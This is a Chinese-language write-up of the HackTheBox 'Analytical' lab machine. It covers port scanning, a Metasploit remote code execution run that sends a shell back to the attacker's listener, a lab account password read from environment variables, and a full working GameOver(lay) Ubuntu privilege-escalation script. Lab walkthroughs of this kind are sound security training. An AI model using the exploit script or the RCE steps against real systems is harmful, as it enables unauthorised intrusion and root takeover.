目录

信息收集

namp

whatweb

WEB

信息收集

feroxbuster

RCE漏洞

提权

get user

get root

---

信息收集

namp

端口信息探测

┌──(root㉿ru)-[~/kali/hackthebox]
└─# nmap -p- 10.10.11.233 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-18 13:43 CST
Warning: 10.10.11.233 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.233
Host is up (0.26s latency).
Not shown: 65420 closed tcp ports (reset), 113 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 16.90 seconds

服务信息探测

┌──(root㉿ru)-[~/kali/hackthebox]
└─# nmap -sCV -O -A -p 22,80 10.10.11.233 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-18 13:44 CST
Nmap scan report for 10.10.11.233
Host is up (0.30s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (96%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   247.36 ms 10.10.14.1
2   248.82 ms 10.10.11.233

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.25 seconds

---

whatweb

analytical.htb

加入到hosts！

---

WEB

信息收集

他会重定向到这个域名！

data.analytical.htb/

我们加入到hosts文件！

---

我去找了默认的登录账号和密码，但是，没啥用！

---

feroxbuster

经过检查发现 特殊路径

http://data.analytical.htb/api/session/properties

好吧！这个方法似乎行不通！！

---

RCE漏洞

这个漏洞在版本影响非常广！我想这个似乎可以！！

使用msf进行漏洞攻击！！

set rhost data.analytical.htb
set lhost 10.10.14.22
set rport 80
run

---

提权

get user

我一直在进行系统信息收集，但是可以说没有日任何可以利用的！直到....

我使用了export命令，发现了一些可疑的点！然后我是用env把环境变量全部打印出来！发现了密码！

账号：metalytics
密码：An4lytics_ds20223#

使用ssh进行登录即可！！

---

get root

https://medium.com/@0xrave/ubuntu-gameover-lay-local-privilege-escalation-cve-2023-32629-and-cve-2023-2640-7830f9ef204ahttps://medium.com/@0xrave/ubuntu-gameover-lay-local-privilege-escalation-cve-2023-32629-and-cve-2023-2640-7830f9ef204a

#!/bin/bash

# CVE-2023-2640 CVE-2023-3262: GameOver(lay) Ubuntu Privilege Escalation

echo "[+] You should be root now"
echo "[+] Type 'exit' to finish and leave the house cleaned"

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'

---

完成！非常easy！！！